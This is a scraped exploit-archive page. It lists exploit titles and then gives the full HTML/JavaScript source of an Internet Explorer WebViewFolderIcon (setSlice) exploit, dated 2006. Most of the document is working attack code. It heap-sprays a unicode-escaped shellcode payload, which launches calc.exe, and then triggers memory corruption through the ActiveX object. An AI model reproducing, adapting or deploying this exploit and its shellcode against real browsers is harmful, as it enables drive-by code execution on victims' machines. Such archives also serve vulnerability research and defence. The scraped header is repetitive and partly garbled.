
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
67 lines
1.8 KiB
HTML
Executable file
67 lines
1.8 KiB
HTML
Executable file
<!--
|
|
|
|
..::[ jamikazu presents ]::..
|
|
|
|
Microsoft Internet Explorer WebViewFolderIcon (setSlice) Exploit (0day)
|
|
Works on all Windows XP versions including SP2
|
|
|
|
Author: jamikazu
|
|
Mail: jamikazu@gmail.com
|
|
|
|
Bug discovered by Computer H D Moore (http://www.metasploit.com)
|
|
|
|
Credit: metasploit, SkyLined
|
|
|
|
invokes calc.exe if successful
|
|
|
|
-->
|
|
|
|
<HTML>
|
|
<BODY>
|
|
<SCRIPT language="javascript">
|
|
|
|
var heapSprayToAddress = 0x05050505;
|
|
var payLoadCode = unescape(
|
|
"%u9090%u9090%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120" +
|
|
"%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424" +
|
|
"%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304" +
|
|
"%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0" +
|
|
"%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%uF068%u048A%u685F%uFE98%u0E8A" +
|
|
"%uFF57%u63E7%u6C61%u0063");
|
|
var heapBlockSize = 0x400000;
|
|
var payLoadSize = payLoadCode.length * 2;
|
|
var spraySlideSize = heapBlockSize - (payLoadSize+0x38);
|
|
var spraySlide = unescape("%u0505%u0505");
|
|
spraySlide = getSpraySlide(spraySlide,spraySlideSize);
|
|
heapBlocks = (heapSprayToAddress - 0x400000)/heapBlockSize;
|
|
memory = new Array();
|
|
|
|
for (i=0;i<heapBlocks;i++)
|
|
{
|
|
memory[i] = spraySlide + payLoadCode;
|
|
}
|
|
|
|
for ( i = 0 ; i < 128 ; i++)
|
|
{
|
|
try{
|
|
var tar = new ActiveXObject('WebViewFolderIcon.WebViewFolderIcon.1');
|
|
tar.setSlice(0x7ffffffe, 0x05050505, 0x05050505,0x05050505 );
|
|
}catch(e){}
|
|
}
|
|
|
|
function getSpraySlide(spraySlide, spraySlideSize)
|
|
{
|
|
while (spraySlide.length*2<spraySlideSize)
|
|
{
|
|
spraySlide += spraySlide;
|
|
}
|
|
spraySlide = spraySlide.substring(0,spraySlideSize/2);
|
|
return spraySlide;
|
|
}
|
|
|
|
</SCRIPT>
|
|
|
|
</BODY>
|
|
</HTML>
|
|
|
|
# milw0rm.com [2006-09-28]
|